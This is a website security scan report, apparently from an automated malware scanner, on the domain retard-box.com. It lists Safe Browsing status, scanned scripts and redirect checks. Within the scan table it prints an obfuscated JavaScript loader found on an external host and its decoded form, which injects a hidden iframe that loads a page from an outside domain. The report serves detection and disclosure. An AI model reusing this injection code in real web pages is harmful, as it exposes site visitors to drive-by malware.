Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=retard-box.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://retard-box.com/ | 200 OK Content-Length: 4039 Content-Type: text/html | clean |
http://lr-studio.16mb.com/mltools.js | 200 OK Content-Length: 3512 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{eshshesh++;}catch(zxc){try{aewtvawetwe|15232}catch(esgsh){m=Math;if(m)f="flo"+"or";} n="126..135..1470..1530..448..600..1400..1665..1386..1755..1526..1515..1540..1740..644..1545..1414..1740..966..1620..1414..1635..1414..1650..1624..1725..924..1815..1176..1455..1442..1170..1358..1635..1414..600..546..1470..1554..1500..1694..585..574..1365..672..1395..574..1845..182..135..126..135..1470..1530..1596..1455..1526..1515..1596..600..574..885..182..135..126..1875..448..1515..1512..1725..1414..48 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://abarboza.com.br/28562245.html' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://abarboza.com.br/28562245.html');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','1 <iframe src='http://abarboza.com.br/28562245.html' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://idbmarket.com/mltools.js | 403 Forbidden Content-Length: 461 Content-Type: text/html | clean |
http://idbmarket.com/test404page.js | 403 Forbidden Content-Length: 465 Content-Type: text/html | clean |
http://wojtek.xon.pl/mltools.js></script><script type= | 404 Not Found Content-Length: 362 Content-Type: text/html | clean |
http://sem-elektrik.com/jstools.js | 500 Can't connect to sem-elektrik.com:80 Content-Length: 191 Content-Type: text/plain | clean |
http://xn--przewraliwiony-hdd.wodzislaw.pl/jstools.js | 500 Can't connect to xn--przewraliwiony-hdd.wodzislaw.pl:80 Content-Length: 210 Content-Type: text/plain | clean |
http://webmarx.nl/tempjs.js | 500 Can't connect to webmarx.nl:80 Content-Length: 185 Content-Type: text/plain | clean |
http://studiodada.biz/minijtools.js | HTTP/1.1 302 Found Connection: close Date: Thu, 22 Jan 2015 05:32:16 GMT Location: http://dfltweb1.onamae.com Server: Apache Content-Length: 210 Content-Type: text/html; charset=iso-8859-1 | clean |
http://dfltweb1.onamae.com/ | 200 OK Content-Length: 1390 Content-Type: text/html | clean |
http://polycarbonate.org.ua/jstools.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://blinkherb.com/jstools.js | 404 Not Found Content-Length: 390 Content-Type: text/html | clean |
http://www.magicjoefuncenters.de/minijtools.js | 500 Can't connect to www.magicjoefuncenters.de:80 Content-Length: 200 Content-Type: text/plain | clean |
http://up.milleniumstudio.pl/cssminibar.js | 404 Not Found Content-Length: 18350 Content-Type: text/html | clean |
http://www.milleniumstudio.pl/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://www.milleniumstudio.pl/wp-content/themes/milleniumstudio/js/jquery.easing.1.3.js?ver=3.5 | 200 OK Content-Length: 8101 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: retard-box.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 22 Jan 2015 05:32:12 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 4039
Content-Type: text/html
Last-Modified: Wed, 18 Jul 2012 13:42:30 GMT
...4039 bytes of data.
GET / HTTP/1.1
Host: retard-box.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 22 Jan 2015 05:32:12 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 4039
Content-Type: text/html
Last-Modified: Wed, 18 Jul 2012 13:42:30 GMT
...4039 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: retard-box.com
Referer: http://www.google.com/search?q=retard-box.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: retard-box.com
Referer: http://www.google.com/search?q=retard-box.com
Result:
The result is similar to the first query. There are no suspicious redirects found.